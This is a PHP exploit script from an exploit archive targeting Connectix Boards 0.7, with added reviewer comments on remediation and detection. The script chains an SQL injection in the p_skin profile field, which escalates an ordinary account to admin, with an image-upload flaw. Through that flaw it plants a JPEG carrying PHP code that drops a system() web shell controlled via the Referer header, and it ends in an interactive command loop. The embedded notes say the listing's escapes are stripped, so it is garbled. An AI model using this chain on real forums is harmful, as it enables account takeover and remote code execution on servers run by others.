Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit

2007-03-08 / 2007-03-09
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

#!/usr/bin/php
<?php
/**
 * This file require the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 **/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

# Reviewer notes:
#  - Two Connectix Boards defects are chained. (1) The p_skin profile field is
#    concatenated unescaped into an UPDATE statement while the isSkin() gate
#    only probes is_dir() on it (part.userprofile.php / lib.cb.php excerpts
#    quoted inside sploit() below). (2) The admin smiley upload verifies that
#    the file *is* an image but stores it under the caller-chosen name and
#    extension (admin.bbcode.php excerpt quoted below $f).
#    Remediation: prepared statements plus an allow-list of skin names for (1);
#    server-generated file names, an extension allow-list and a non-executable
#    upload directory for (2).
#  - Backslash escapes appear to have been stripped by the extraction that
#    produced this listing ("n" where a newline was meant, bare "x.." pairs
#    inside $f), so the listing as shown is not a faithful copy of the script.
#  - Everything on $xpl (agent/post/get/formdata/cookiejar/showcookie/...) and
#    the frmdt_* names come from phpsploitclass.php, which is not visible here.

if($argc < 9) {
    print(" Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit ------------------------------------------------------------------- PHP conditions: none Credits: DarkFig <gmdarkfig (at) gmail (dot) com [email concealed]> URL: http://www.acid-root.new.fr/ ------------------------------------------------------------------- Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options] Params: -url For example http://victim.com/connectix/ -usr The username of your account -pwd The password of your account -type Privilege Escalation(1) or Code execution(2) Options: -proxy If you wanna use a proxy <proxyhost:proxyport> -proxyauth Basic authentification <proxyuser:proxypwd> ------------------------------------------------------------------- ");
    exit(1);
}

# Required options abort the script when missing (second argument truthy);
# the proxy options are optional and come back as null when absent.
$url = getparam('url',1);
$user = getparam('usr',1);
$pass = getparam('pwd',1);
$type = getparam('type',1);
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
# A skin directory assumed to exist on the target; p_skin has to pass the
# isSkin() is_dir() probe before anything after it matters (see sploit()).
$theme = 'Zephyr';

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);

# Logs in with the supplied ordinary account. Success is inferred from the
# cookie jar containing the text "password" - the exact cookie name is not
# visible here.
print "nTrying to get logged in";
$xpl->post($url.'index.php?act=login',"username=$user&password=$pass&rem ember=on&confirm=Connexion+%21");
if(preg_match("#password#",$xpl->showcookie())) print "nLogged in";
else exit("nExploit failed");

# Stage 1 - privilege escalation: the fragment is appended to the SET list of
# the UPDATE on part.userprofile.php line 310 (quoted in sploit()), so the
# account's usr_class becomes 1. With -type 1 the script stops here.
sploit(", usr_class=1");
if($type==1) exit("nDone, $user is now admin.");

# Fake JPG (with php code) generated with edjpgcom.exe
#
# <?php $handle=fopen('mdrpipicacalolxdwtf.gif.php','w+');
# fwrite($handle,'<?php @system($_SERVER[HTTP_REFERER]); ?/>');
# fclose($handle); unlink($_SERVER[PHP_SELF]); ?/>
#
# $f is JPEG-structured data that carries the PHP shown above. getimagesize()
# only inspects the image structure and therefore accepts it; an image check
# by itself does not make an uploaded file safe to serve from the web root.
$f = "xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60x00x6 0x00x00xFF"
."xDBx00x43x00x08x06x06x07x06x05x08x07x07x07x09x09x08x 0Ax0Cx14"
."x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14x1Dx1Ax1Fx1Ex1Dx1Ax1Cx 1Cx20x24"
."x2Ex27x20x22x2Cx23x1Cx1Cx28x37x29x2Cx30x31x34x34x34x 1Fx27x39"
."x3Dx38x32x3Cx2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx 0Bx0Cx18"
."x0Dx0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x 32x32x32"
."x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x 32x32x32"
."x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x FFxFEx00"
."xA5x3Cx3Fx70x68x70x20x24x68x61x6Ex64x6Cx65x3Dx66x6Fx 70x65x6E"
."x28x27x6Dx64x72x70x69x70x69x63x61x63x61x6Cx6Fx6Cx78x 64x77x74"
."x66x2Ex67x69x66x2Ex70x68x70x27x2Cx27x77x2Bx27x29x3Bx 66x77x72"
."x69x74x65x28x24x68x61x6Ex64x6Cx65x2Cx27x3Cx3Fx70x68x 70x20x40"
."x73x79x73x74x65x6Dx28x24x5Fx53x45x52x56x45x52x5Bx48x 54x54x50"
."x5Fx52x45x46x45x52x45x52x5Dx29x3Bx20x3Fx3Ex27x29x3Bx 66x63x6C"
."x6Fx73x65x28x24x68x61x6Ex64x6Cx65x29x3Bx20x75x6Ex6Cx 69x6Ex6B"
."x28x24x5Fx53x45x52x56x45x52x5Bx50x48x50x5Fx53x45x4Cx 46x5Dx29"
."x3Bx20x3Fx3ExFFxC0x00x11x08x00x01x00x01x03x01x22x00x 02x11x01"
."x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01x01x01x01x01x 00x00x00"
."x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFx C4x00xB5"
."x10x00x02x01x03x03x02x04x03x05x05x04x04x00x00x01x7Dx 01x02x03"
."x00x04x11x05x12x21x31x41x06x13x51x61x07x22x71x14x32x 81x91xA1"
."x08x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x 17x18x19"
."x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43x44x45x 46x47x48"
."x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x 6Ax73x74"
."x75x76x77x78x79x7Ax83x84x85x86x87x88x89x8Ax92x93x94x 95x96x97"
."x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6x B7xB8xB9"
."xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8x D9xDAxE1"
."xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8x F9xFAxFF"
."xC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01x01x00x00x 00x00x00"
."x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5x11x 00x02x01"
."x02x04x04x03x04x07x05x04x04x00x01x02x77x00x01x02x03x 11x04x05"
."x21x31x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91x A1xB1xC1"
."x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x 18x19x1A"
."x26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47x48x 49x4Ax53"
."x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74x 75x76x77"
."x78x79x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x 97x98x99"
."x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8x B9xBAxC2"
."xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAx E2xE3xE4"
."xE5xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx 00x0Cx03"
."x01x00x02x11x03x11x00x3Fx00xF7xFAx28xA2x80x3FxFFxD9";

# +admin.bbcode.php
# |
# 95. if(isset($_POST['wherefile'])) {
# 96. if ($_POST['wherefile']=='upload') {
# 97. if (!empty($_FILES['uploadimage']['size'])){
# 98. if ($image=getimagesize(trim($_FILES['uploadimage']['tmp_name']))) {
# 99. $val = array(IMAGETYPE_GIF,IMAGETYPE_JPEG,IMAGETYPE_PNG);
# 100. if ($_FILES['uploadimage']['size'] <= 20480 && in_array($image[2],$val)) {
# 101. $filename = $smile->smiley_librariesdir.$_POST['sm_filenameserver'];
# 102. $filename = str_replace('../','',trim($filename));
# 103. //si le filenameserver contient un dossier : on cre ce dossier:   [fr: if filenameserver contains a folder, create that folder]
# 104. mkdirs($smile->smiley_dir.dirname($filename));
# 105. if (move_uploaded_file($_FILES['uploadimage']['tmp_name'], $smile->smiley_dir.$_POST['sm_filenameserver'])) {
# 106. $do=true;
# 107. }
#
# Stage 2 - code execution (needs the admin rights obtained in stage 1).
# Against the checks quoted above: size, MIME type and getimagesize() all
# pass for $f, while the stored name is taken verbatim from
# $_POST['sm_filenameserver'] (line 105). The str_replace('../','') on line
# 102 cleans $filename, a variable the move_uploaded_file() call never uses,
# and no extension allow-list exists, so a .php file lands in the
# web-served smileys/ directory. frmdt_* are presumably constants defined by
# phpsploitclass.php - confirm.
$arr = array(frmdt_url => $url.'admin.php?act=bb&#138;&#130;=4',
             "sm_name" => ":AbCdEfGhIj1234dsupersmilepowaa:",
             "sm_filenamesubdir" => "libraries/",
             "sm_filenameserver" => "xd.gif.php",
             "wherefile" => "upload",
             "sm_send" => "Confirmer",
             "uploadimage" => array(frmdt_type => "image/gif",
                                    frmdt_filename => "xd.gif.php",
                                    frmdt_content => $f));
$xpl->formdata($arr);
# Fetching the uploaded file runs the embedded code, which (per the comment
# block above $f) writes the second script and unlinks itself.
$xpl->get($url."smileys/xd.gif.php");

# Interactive loop: every stdin line is sent as the Referer header, which the
# dropped script hands to system(). NOTE(review): $shell is never assigned in
# this file, so the prompt is just "> " (the notice is suppressed above).
# For detection, the observable pattern is GET requests to smileys/*.php
# whose Referer header contains command text, plus the .gif.php names used here.
print "n$shell> ";
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) {
    $xpl->addheader("Referer",$cmd);
    $xpl->get($url."smileys/mdrpipicacalolxdwtf.gif.php");
    print $xpl->getcontent()."n$shell> ";
}

# Submits the "change display parameters" profile form with p_skin carrying
# SQL, then checks the profile page for the planted marker.
# @param string $sql  extra ", column=value" assignments appended to the SET list
# Returns nothing on success; exits the script when the marker is not found.
function sploit($sql) {
    global $url,$xpl,$theme,$user;
    # p_skin = <real skin> + NUL + SQL tail. isSkin() (lib.cb.php line 134)
    # only calls is_dir() on the value; presumably is_dir() stops at the NUL
    # on the PHP versions of that era (confirm), so the probe sees
    # skins/Zephyr while line 310 concatenates the whole string into the
    # query. common.php (lines 105-109) also strips magic_quotes slashes, so
    # the quote reaches MySQL intact, and the trailing "#" turns the rest of
    # the original statement into a MySQL comment. The usr_signature
    # subselect plants a marker the profile page (page=5) is expected to echo.
    $pdat = "changeparams=1"
    ."&p_usrs=20"
    ."&p_topics=20"
    ."&p_msgs=15"
    ."&p_res=12"
    ."&p_skin=$theme"
    ."%00',usr_pref_skin='$theme',usr_signature=(SELECT '[XPL_IS_OK]')$sql WHERE usr_name='$user' #"
    ."&p_lang=fr"
    ."&p_timezone=1";

    # +common.php
    # |
    # 95. function cleanArray(&$arr) {
    # 96. if (!empty($arr) && is_array($arr)) {
    # 97. foreach($arr as $k => $v) {
    # 98. if (is_array($v)) cleanArray($arr[$k]);
    # 99. else $arr[$k] = stripslashes($v);
    # 100. }
    # 101. }
    # 102. }
    # |
    # 105. if (get_magic_quotes_gpc()) {
    # 106. cleanArray($_POST);
    # 107. cleanArray($_COOKIE);
    # 108. cleanArray($_GET);
    # 109. }
    #
    # +part.userprofile.php
    # |
    # 305. /* Changement des paramètres d'affichage (pas accessible par les modos ou admins) */   [fr: changing the display parameters (not reachable by mods or admins)]
    # 306. } elseif (isset($_POST['changeparams']) && $edit_id==$_SESSION['userid']) {
    # 307. if ( isset($_POST['p_usrs'],$_POST['p_topics'],$_POST['p_msgs'],$_POST['p_res '],$_POST['p_skin'],$_POST['p_lang'],$_POST['p_timezone']) ) {
    # 308. if (is_numeric($_POST['p_usrs']) && is_numeric($_POST['p_topics']) && is_numeric($_POST['p_msgs']) && is_numeric($_POST['p_res']) && isLang($_POST['p_lang']) && isSkin($_POST['p_skin'])) {
    # 309. if ((int)$_POST['p_usrs']>=5 && (int)$_POST['p_usrs']<=50 && (int)$_POST['p_topics']>=5 && (int)$_POST['p_topics']<=50 && (int)$_POST['p_msgs']>=5 && (int)$_POST['p_msgs']<=50 && (int)$_POST['p_res']>=5 && (int)$_POST['p_res']<=50 && in_array($_POST['p_timezone'],array_keys($timezones))) {
    # 310. $GLOBALS['cb_db']->query("UPDATE ".$GLOBALS['cb_db']->prefix."users SET usr_pref_msgs='".(int)$_POST['p_msgs']."',usr_pref_usrs='".(int)$_POST[' p_usrs']."',usr_pref_topics='".(int)$_POST['p_topics']."',usr_pref_res=' ".(int)$_POST['p_res']."',usr_pref_lang='".$_POST['p_lang']."',usr_pref_ skin='".$_POST['p_skin']."',usr_pref_timezone='".$_POST['p_timezone']."' ,usr_pref_ctsummer=".((int)(isset($_POST['p_ctsummer']) && $_POST['p_ctsummer']=='on'))." WHERE usr_id=".$_SESSION['cb_user']->userid);
    # 311. $_SESSION['cb_user']->reloadnext=true;
    # 312. redirect(manage_url('index.php?act=user&editprofile='.$_SESSION['userid' ].'&page=6','forum-profile'.$_SESSION['userid'].'-params.html'));
    #
    # +lib.cb.php
    # |
    # 117. function isLang ($langtype) {
    # 118. return is_dir(CB_PATH.'lang/'.$langtype);
    # 119. }
    # |
    # 133. function isSkin ($skintype) {
    # 134. return is_dir(CB_PATH.'skins/'.$skintype);
    # 135. }
    #
    # The fix is a prepared statement for line 310 and validating p_skin
    # against an enumerated list of skin names rather than an is_dir() probe.
    $xpl->post($url."index.php?act=user&editprofile=-1&page=6",$pdat);
    $xpl->get($url."index.php?act=user&editprofile=-1&page=5");
    # NOTE(review): why editprofile=-1 satisfies $edit_id==$_SESSION['userid']
    # (line 306) is not visible here. Also '#[XPL_IS_OK]#' is a character
    # class, so it matches any single one of X,P,L,_,I,S,O,K on the page
    # instead of the literal marker - the check is almost certainly always
    # true on an HTML page, so failures are not detected.
    if(preg_match('#[XPL_IS_OK]#',$xpl->getcontent())) return;
    else exit("Exploit failed");
}

# Minimal argv scanner: returns the token that follows "-<param>".
# @param string $param  option name without the leading dash
# @param mixed  $opt    truthy = required: abort the script when absent
# @return string|null   the option value, or null when absent and optional
function getparam($param,$opt='') {
    global $argv;
    # NOTE(review): $value is the index and $key the token (the names are
    # reversed), and $argv[$value+1] is read without a bounds check, so an
    # option given as the last token yields null.
    foreach($argv as $value => $key) {
        if($key == '-'.$param) return $argv[$value+1];
    }
    if($opt) exit("n-$param parameter required");
    else return;
}
?>

